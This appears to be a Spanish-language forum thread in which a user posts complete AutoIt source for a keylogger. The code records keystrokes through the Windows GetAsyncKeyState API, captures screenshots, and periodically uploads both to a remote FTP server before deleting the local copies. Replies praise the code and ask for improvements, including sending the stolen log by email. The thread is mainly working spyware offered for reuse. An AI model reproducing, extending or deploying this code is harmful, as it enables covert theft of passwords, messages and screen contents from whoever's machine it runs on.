Buenas aquí dejo una función que captura las pulsaciones de teclado mediante las APIs GetAsyncKeyState y GetKeyState, también hace una captura de pantalla y lo envía todo a través de FTP.
#cs ----------------------------------------------------------------------------

AutoIt Version: 3.3.8.1
 Author: Naker90

Script Function:
	Captura de pulsaciones de teclado por la API GetAsyncKeyState (Mayusculas, minusculas y numeros), captura de pantalla y envio del Log a travez de FTP (File Transfer Protocol)

Parametros:
	$sMinute_Delay => Tiempo de espera entre envio de Logs
	    $sServerIP => IP del servidor FTP
			$sPort => Puerto del Servidor FTP
		$sUsername => Nombre de usuario del servidor FTP
		$sPassword => Contraseña del usuario del servidor FTP

Ejemplo de uso:
	Keylogger_Function(10,'XXX.XXX.XXX.XXX', 21, 'Naker90', '123')

#ce ----------------------------------------------------------------------------

#include <FTPEx.au3>
#include <ScreenCapture.au3>

Func Keylogger_Function($sMinute_Delay, $sServerIP, $sPort, $sUsername, $sPassword)

Local $sTimeInit = TimerInit()
	Local $sDelay = $sMinute_Delay * 60000
	Local $sAlphabet[48] = ['0x30', '0x31', '0x32', '0x33', '0x34', '0x35', '0x36', '0x37', '0x38', '0x39', '0x41', '0x42', '0x43', '0x44', '0x45', '0x46', '0x47', '0x48', _
			'0x49', '0x4A', '0x4B', '0x4C', '0x4D', '0x4E', '0x4F', '0x50', '0x51', '0x52', '0x53', '0x54', '0x55', '0x56', '0x57', '0x58', '0x59', '0x60', '0x20', '0x2E']

While 1
		Local $sInput
		For $si = 0 To 47

Local $sShift = DllCall('User32.dll', 'int', 'GetKeyState', 'long', 0x10)
			Local $sBlockMayus = DllCall('User32.dll', 'int', 'GetKeyState', 'long', 0x14)
			Local $sGetAsyncKeyState = DllCall('User32.dll', 'int', 'GetAsyncKeyState', 'int', $sAlphabet[$si])

If $sGetAsyncKeyState[0] = -32767 Then
				If $sShift[0] <> 0 And 1 Or $sBlockMayus[0] <> 0 And 1 Then
					$sInput = $sInput & ChrW($sAlphabet[$si])
				Else
					$sInput = $sInput & StringLower(ChrW($sAlphabet[$si]))
				EndIf
			EndIf

Next

If TimerDiff($sTimeInit) >= $sDelay Then

Local $sLog = FileOpen(@TempDir & '\Log.txt', 1)
			FileWrite($sLog, $sInput)
			FileClose($sLog)

Local $sScreenShot = _ScreenCapture_Capture(@TempDir & '\Image.jpg')

File_Transfer_Protocol($sServerIP, $sPort, $sUsername, $sPassword)

FileDelete(@TempDir & '\Log.txt')
			FileDelete(@TempDir & '\Image.jpg')

$sInput = ''

$sTimeInit = TimerInit()
		EndIf

WEnd

EndFunc

Func File_Transfer_Protocol($ServerIP, $Port, $Username, $Password)

Local $Directory =  '\' & @MDAY & '-' & @MON & '-' & @YEAR & '_' & @HOUR & '-' & @MIN

Local $Open = _FTP_Open('MyFTP Control')
	Local $Connect = _FTP_Connect($Open, $ServerIP, $Username, $Password, 0, $Port)
	_FTP_DirCreate($Connect, $Directory)
	_FTP_FilePut($Connect, @TempDir & '\Log.txt', $Directory & '\Log.txt')
	_FTP_FilePut($Connect, @TempDir & '\Image.jpg', $Directory & '\Image.jpg')
	_FTP_Close($Connect)

EndFunc
Saludos
Me gusta luego la miro bien. por ahora te recomiendo que no declares variables dentro de Loops.

Saludos Sigue así
Imagen
Muy limpio el code y entendible de hecho lo lei con mucha claridad gracias por compartir maquina
Abolición para el torneo del toro de la vega. Death to the murderers of bulls.
Gracias Naker90! sin duda muy útil y fácil de entender execelente estudio y ver si puedo hacer una para enviar por correo electrónico el registro, si alguien con conocimientos en autoit podría dar un ejemplo de cómo enviar correo electrónico y también si hay sería completa esta fuente. Gracias Naker90 siempre me ha ayudado.
"Concentrarse en las fortalezas, reconocer las debilidades, las oportunidades y tomar la guardia contra las amenazas."

―Sun Tzu
AMigo Naker90 muy bueno el codigo, lo estuve revisando y esta muy bueno aunque se puede mejorar un poco mas, ya que no te detecta los espacios ni los enter, osea esta todo junto. pero muy bueno para entenderlo me sirvió de mucho. Yo recién estoy aprendiendo con este lenguaje y espero seguir aprendiendo con tus codes.

Saludos!!!
Nunca consideres el estudio como una obligación, sino como una oportunidad para penetrar en el bello y maravilloso mundo del saber.
Responder

Volver a “Fuentes”